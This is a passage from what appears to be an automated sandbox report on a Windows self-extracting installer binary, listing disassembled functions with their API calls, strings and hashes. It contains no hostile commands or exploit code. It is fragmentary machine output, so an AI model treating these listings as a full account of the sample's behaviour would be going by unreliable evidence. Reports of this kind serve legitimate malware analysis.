                                                            • wsprintfW.USER32 ref: 00404CC6
                                                            • GetProcAddress.KERNEL32(SetThreadPreferredUILanguages), ref: 00404CDE
                                                            Strings
                                                            • SetThreadPreferredUILanguages, xrefs: 00404CD3
                                                            • %04X%c%04X%c, xrefs: 00404CC0
                                                            • SetProcessPreferredUILanguages, xrefs: 00404C93
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Resource$AddressFindProc$HandleLoadLockModuleSizeofwsprintf
                                                            • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages
                                                            • API String ID: 2090077119-3413765421
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00408FA4
                                                            • SetWindowsHookExW.USER32(00000007,Function_00009F59,00000000,00000000), ref: 00408FB4
                                                            • GetCurrentThreadId.KERNEL32 ref: 00408FC8
                                                            • SetWindowsHookExW.USER32(00000002,Function_00009F2A,00000000,00000000), ref: 00408FD8
                                                            • EndDialog.USER32(?,00000000), ref: 00409003
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CurrentHookThreadWindows$Dialog
                                                            • String ID:
                                                            • API String ID: 1967849563-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000019,00000000), ref: 00403997
                                                            • CoCreateInstance.OLE32(00428EE4,00000000,00000001,00428EA4,?,.lnk,?), ref: 00403AFA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CreateFolderInstancePathSpecial
                                                            • String ID: .lnk
                                                            • API String ID: 3960669845-24824748
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040496E
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00404980
                                                            • FreeSid.ADVAPI32(?), ref: 00404989
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `:C
                                                            • API String ID: 0-2112543841
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetCommandLineW.KERNEL32(?,?), ref: 00402328
                                                            • GetStartupInfoW.KERNEL32(00000044,?,?,?,?,?,?,?,?,?,00000000), ref: 00402464
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 0040248B
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00402495
                                                            • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004024A6
                                                            • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004024BC
                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004024CC
                                                            • SetInformationJobObject.KERNEL32(00000000,00000007,00000000,00000008), ref: 004024EB
                                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004024F4
                                                            • GetQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040250D
                                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040251A
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 00402521
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402530
                                                            • GetExitCodeProcess.KERNEL32(?,00000000), ref: 00402539
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00402543
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040254F
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00402556
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040255D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                                            • String ID: " -$D$sfxwaitall
                                                            • API String ID: 47019888-3949692445
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00408798
                                                            • LoadIconW.USER32(00000000), ref: 0040879F
                                                            • GetSystemMetrics.USER32(00000032), ref: 004087B1
                                                            • GetSystemMetrics.USER32(00000031), ref: 004087B6
                                                            • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 004087BF
                                                            • LoadImageW.USER32(00000000), ref: 004087C6
                                                            • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 004087E4
                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004087F1
                                                              • Part of subcall function 00409517: GetDlgItem.USER32(?,?), ref: 00409523
                                                              • Part of subcall function 00409517: GetWindowTextLengthW.USER32(00000000), ref: 0040952A
                                                              • Part of subcall function 00409517: GetDlgItem.USER32(?,?), ref: 0040953D
                                                              • Part of subcall function 00409D11: GetDlgItem.USER32(?,?), ref: 00409D20
                                                              • Part of subcall function 00409D11: ShowWindow.USER32(00000000,?,?,00408A44,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00409D38
                                                              • Part of subcall function 004096E4: GetDlgItem.USER32(?,000004B3), ref: 004096FA
                                                              • Part of subcall function 004096E4: SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040970C
                                                              • Part of subcall function 004096E4: GetDlgItem.USER32(?,000004B4), ref: 00409716
                                                              • Part of subcall function 004096E4: SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00409722
                                                              • Part of subcall function 004096E4: SendMessageW.USER32(?,00000401,?,00000000), ref: 00409731
                                                              • Part of subcall function 004096E4: GetDlgItem.USER32(?,?), ref: 00409739
                                                              • Part of subcall function 004096E4: SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00409745
                                                              • Part of subcall function 004096E4: GetDlgItem.USER32(?,?), ref: 0040974D
                                                              • Part of subcall function 004096E4: SetFocus.USER32(00000000,?,?,004088F9,000004B4,000004B3,00000000,000004B4,00000000,?,00000000), ref: 00409750
                                                              • Part of subcall function 00405296: SetWindowTextW.USER32(?,?), ref: 004052F7
                                                              • Part of subcall function 0040501D: GetClassNameA.USER32(?,?,00000040), ref: 0040502E
                                                              • Part of subcall function 0040501D: lstrcmpiA.KERNEL32(?,STATIC), ref: 00405045
                                                              • Part of subcall function 0040501D: GetWindowLongW.USER32(?,000000F0), ref: 00405056
                                                              • Part of subcall function 0040501D: GetParent.USER32(?), ref: 0040508B
                                                              • Part of subcall function 0040501D: LoadLibraryA.KERNEL32(riched20), ref: 004050A0
                                                              • Part of subcall function 0040501D: GetMenu.USER32(?), ref: 004050B3
                                                              • Part of subcall function 0040501D: SetThreadLocale.KERNEL32(00000419), ref: 004050C0
                                                              • Part of subcall function 0040501D: CreateWindowExW.USER32(00000000,RichEdit20W,00426A08,50000804,?,?,?,?,00000000,00000000,00000000,00000000), ref: 004050F0
                                                              • Part of subcall function 0040501D: DestroyWindow.USER32(?), ref: 004050FD
                                                              • Part of subcall function 0040501D: SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00405114
                                                              • Part of subcall function 0040501D: GetSysColor.USER32(0000000F), ref: 00405118
                                                              • Part of subcall function 0040501D: SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00405126
                                                            • GetDlgItem.USER32(?,000004B2), ref: 0040880D
                                                            • GetDlgItem.USER32(?,000004B2), ref: 00408819
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00408820
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00408835
                                                            • GetDlgItem.USER32(?,000004B5), ref: 00408842
                                                            • GetDlgItem.USER32(?,000004B5), ref: 00408852
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0040885D
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0040886C
                                                            • GetDlgItem.USER32(?,000004B2), ref: 00408882
                                                            • GetWindow.USER32(?,00000005), ref: 00408967
                                                            • GetWindow.USER32(?,00000005), ref: 00408984
                                                            • GetWindow.USER32(?,00000005), ref: 0040899D
                                                            • GetModuleHandleW.KERNEL32(00000000,00000065,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00408A01
                                                            • LoadIconW.USER32(00000000), ref: 00408A08
                                                            • GetDlgItem.USER32(?,000004B1), ref: 00408A27
                                                            • SendMessageW.USER32(00000000), ref: 00408A2A
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ItemWindow$MessageSend$Long$Load$HandleModule$IconMetricsSystemText$ClassColorCreateDestroyFocusImageLengthLibraryLocaleMenuNameParentShowThreadlstrcmpi
                                                            • String ID:
                                                            • API String ID: 2214986222-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetWindowDC.USER32(00000000), ref: 004034B1
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 004034BF
                                                            • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004034D2
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00403505
                                                            • MulDiv.KERNEL32(?,00000003,00000002), ref: 00403510
                                                            • MulDiv.KERNEL32(?,00000003,00000002), ref: 0040351E
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0040352D
                                                            • CreateCompatibleDC.GDI32(?), ref: 00403537
                                                            • SelectObject.GDI32(00000000,?), ref: 00403546
                                                            • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 00403551
                                                            • SelectObject.GDI32(?,00000000), ref: 0040355B
                                                            • SetStretchBltMode.GDI32(?,00000004), ref: 00403564
                                                            • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 00403586
                                                            • GetCurrentObject.GDI32(?,00000007), ref: 0040358F
                                                            • SelectObject.GDI32(?,00000000), ref: 004035A1
                                                            • SelectObject.GDI32(?,00000000), ref: 004035A7
                                                            • DeleteDC.GDI32(?), ref: 004035B2
                                                            • DeleteDC.GDI32(?), ref: 004035B7
                                                            • ReleaseDC.USER32(00000000,?), ref: 004035BE
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 004035CA
                                                            • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 004035D7
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                            • String ID:
                                                            • API String ID: 3462224810-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrcmpiW.KERNEL32(00000000,00427A14), ref: 00406182
                                                              • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404227
                                                              • Part of subcall function 004041E0: wsprintfW.USER32 ref: 00404238
                                                              • Part of subcall function 004041E0: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00404247
                                                              • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404252
                                                              • Part of subcall function 004041E0: GetEnvironmentVariableW.KERNEL32(?,00000000,0000002D), ref: 0040427C
                                                              • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404287
                                                              • Part of subcall function 004041E0: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00404299
                                                              • Part of subcall function 004041E0: SetLastError.KERNEL32(00401877), ref: 004042CD
                                                              • Part of subcall function 004041E0: lstrlenA.KERNEL32(00426DB8), ref: 00404303
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$EnvironmentVariablelstrcmpi$lstrlenwsprintf
                                                            • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$PasswordText$PasswordTitle$Progress$Title$WarningTitle$X]n
                                                            • API String ID: 2247831197-3525894635
                                                            • Opcode ID: 31eb57f1143eb308704bae98bc2cb1a1f499bc4d5c3bf4a2c1d3cbaf822fcb56
                                                            • Instruction ID: d04aef037a93914b7a9787fb7c01cd5394099a443c1f6d09b2a032840ec7ae63
                                                            • Opcode Fuzzy Hash: 31eb57f1143eb308704bae98bc2cb1a1f499bc4d5c3bf4a2c1d3cbaf822fcb56
                                                            • Instruction Fuzzy Hash: C15174B1700314AEE704BB76BD63A3A329DDA85B48B65153FF901A72D1DBBC8D008B5C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetClassNameA.USER32(?,?,00000040), ref: 0040502E
                                                            • lstrcmpiA.KERNEL32(?,STATIC), ref: 00405045
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00405056
                                                              • Part of subcall function 004047FA: GetWindowTextLengthW.USER32(?), ref: 0040480C
                                                              • Part of subcall function 004047FA: GetWindowTextW.USER32(?,00000000,00000001), ref: 00404828
                                                            • GetParent.USER32(?), ref: 0040508B
                                                            • LoadLibraryA.KERNEL32(riched20), ref: 004050A0
                                                              • Part of subcall function 0040407A: GetParent.USER32(?), ref: 00404081
                                                              • Part of subcall function 0040407A: GetWindowRect.USER32(?,?), ref: 00404095
                                                              • Part of subcall function 0040407A: ScreenToClient.USER32(00000000,?), ref: 0040409D
                                                              • Part of subcall function 0040407A: ScreenToClient.USER32(00000000,?), ref: 004040A8
                                                            • GetMenu.USER32(?), ref: 004050B3
                                                            • SetThreadLocale.KERNEL32(00000419), ref: 004050C0
                                                            • CreateWindowExW.USER32(00000000,RichEdit20W,00426A08,50000804,?,?,?,?,00000000,00000000,00000000,00000000), ref: 004050F0
                                                            • DestroyWindow.USER32(?), ref: 004050FD
                                                            • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00405114
                                                            • GetSysColor.USER32(0000000F), ref: 00405118
                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00405126
                                                              • Part of subcall function 00405873: WideCharToMultiByte.KERNEL32(?,00000000,?,?,00000000,?,?,00000000,00000000,?,?,?,?,00401E30,?,?), ref: 004058AA
                                                            • SendMessageW.USER32(00000000,00000461,?,?), ref: 00405151
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$ClientParentScreenText$ByteCharClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuMultiNameRectThreadWidelstrcmpi
                                                            • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                            • API String ID: 1365818316-2281146334
                                                            • Opcode ID: 59383b6c14ab3c31e4b2c1aada10c14020c5782b2597169ac30afe4c17b31a18
                                                            • Instruction ID: 0bfea91ec2faae2404602870067ebb494671179ff6f46fd41a811550d14ae0cd
                                                            • Opcode Fuzzy Hash: 59383b6c14ab3c31e4b2c1aada10c14020c5782b2597169ac30afe4c17b31a18
                                                            • Instruction Fuzzy Hash: 3E3193B1A00219BFDB10ABF5DC49EBF7BBCEB48710F51003AF601B6190D67899019B69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00409D11: GetDlgItem.USER32(?,?), ref: 00409D20
                                                              • Part of subcall function 00409D11: ShowWindow.USER32(00000000,?,?,00408A44,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00409D38
                                                            • GetDlgItem.USER32(?,000004B8), ref: 00408B4B
                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408B5B
                                                            • GetDlgItem.USER32(?,000004B4), ref: 00408B85
                                                              • Part of subcall function 004099F0: SetWindowTextW.USER32(?,00000000), ref: 004099F9
                                                              • Part of subcall function 00409899: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004098D1
                                                              • Part of subcall function 00409899: GetDlgItem.USER32(?,000004B8), ref: 004098EE
                                                              • Part of subcall function 00409899: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004098FD
                                                              • Part of subcall function 00409899: wsprintfW.USER32 ref: 0040991B
                                                              • Part of subcall function 00409899: GetDlgItem.USER32(?,000004B5), ref: 00409939
                                                              • Part of subcall function 00408775: GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00408798
                                                              • Part of subcall function 00408775: LoadIconW.USER32(00000000), ref: 0040879F
                                                              • Part of subcall function 00408775: GetSystemMetrics.USER32(00000032), ref: 004087B1
                                                              • Part of subcall function 00408775: GetSystemMetrics.USER32(00000031), ref: 004087B6
                                                              • Part of subcall function 00408775: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 004087BF
                                                              • Part of subcall function 00408775: LoadImageW.USER32(00000000), ref: 004087C6
                                                              • Part of subcall function 00408775: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 004087E4
                                                              • Part of subcall function 00408775: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004087F1
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 0040880D
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 00408819
                                                              • Part of subcall function 00408775: GetWindowLongW.USER32(00000000,000000F0), ref: 00408820
                                                              • Part of subcall function 00408775: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00408835
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B5), ref: 00408842
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B5), ref: 00408852
                                                              • Part of subcall function 00408775: GetWindowLongW.USER32(00000000,000000F0), ref: 0040885D
                                                              • Part of subcall function 00408775: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0040886C
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 00408882
                                                            • GetDlgItem.USER32(?,000004B5), ref: 00408BAE
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00408BB3
                                                            • GetDlgItem.USER32(?,000004B5), ref: 00408BC7
                                                            • SetWindowLongW.USER32(00000000), ref: 00408BCA
                                                            • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00408BF1
                                                            • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408C03
                                                            • GetDlgItem.USER32(?,000004B4), ref: 00408C11
                                                            • SetFocus.USER32(00000000), ref: 00408C14
                                                            • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408C40
                                                            • CoCreateInstance.OLE32(00428EF4,00000000,00000001,00427EA4,00000000), ref: 00408C6C
                                                            • GetDlgItem.USER32(?,00000002), ref: 00408C8D
                                                            • IsWindow.USER32(00000000), ref: 00408C90
                                                            • GetDlgItem.USER32(?,00000002), ref: 00408CA0
                                                            • EnableWindow.USER32(00000000), ref: 00408CA3
                                                            • GetDlgItem.USER32(?,000004B5), ref: 00408CBB
                                                            • ShowWindow.USER32(00000000), ref: 00408CBE
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Item$Window$Long$MessageSend$System$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTextTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                            • String ID:
                                                            • API String ID: 3521167636-0
                                                            • Opcode ID: fa13f10d23603a3b63cc2f8f2eccc8955f7baacab2cdd4233207b11c06167aac
                                                            • Instruction ID: de3640bd3f08e21a2b23cc6cc41f7c899de82941e7324de98f9a14cd13793bc5
                                                            • Opcode Fuzzy Hash: fa13f10d23603a3b63cc2f8f2eccc8955f7baacab2cdd4233207b11c06167aac
                                                            • Instruction Fuzzy Hash: 6A4187B0740744BFEA206B21DE4AF1B7AADEF40B08F01453DF541A62E1CB799C41CA2C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetClassNameA.USER32(?,?,00000040), ref: 00405620
                                                            • lstrcmpiA.KERNEL32(?,STATIC), ref: 00405637
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00405648
                                                            • GetMenu.USER32(?), ref: 0040565B
                                                              • Part of subcall function 00404C1A: GetModuleHandleW.KERNEL32(00000000), ref: 00404C25
                                                              • Part of subcall function 00404C1A: FindResourceExA.KERNEL32(00000000,?,?), ref: 00404C42
                                                              • Part of subcall function 00404C1A: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00404C56
                                                              • Part of subcall function 00404C1A: SizeofResource.KERNEL32(00000000,00000000), ref: 00404C67
                                                              • Part of subcall function 00404C1A: LoadResource.KERNEL32(00000000,00000000), ref: 00404C71
                                                              • Part of subcall function 00404C1A: LockResource.KERNEL32(00000000), ref: 00404C7C
                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00405688
                                                            • CoInitialize.OLE32(00000000), ref: 004056A8
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 004056B4
                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00428ED4,?), ref: 004056D9
                                                            • GlobalFree.KERNEL32(00000000), ref: 004056E9
                                                              • Part of subcall function 004034A5: GetWindowDC.USER32(00000000), ref: 004034B1
                                                              • Part of subcall function 004034A5: GetDeviceCaps.GDI32(00000000,00000058), ref: 004034BF
                                                              • Part of subcall function 004034A5: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004034D2
                                                              • Part of subcall function 004034A5: GetObjectW.GDI32(?,00000018,?), ref: 00403505
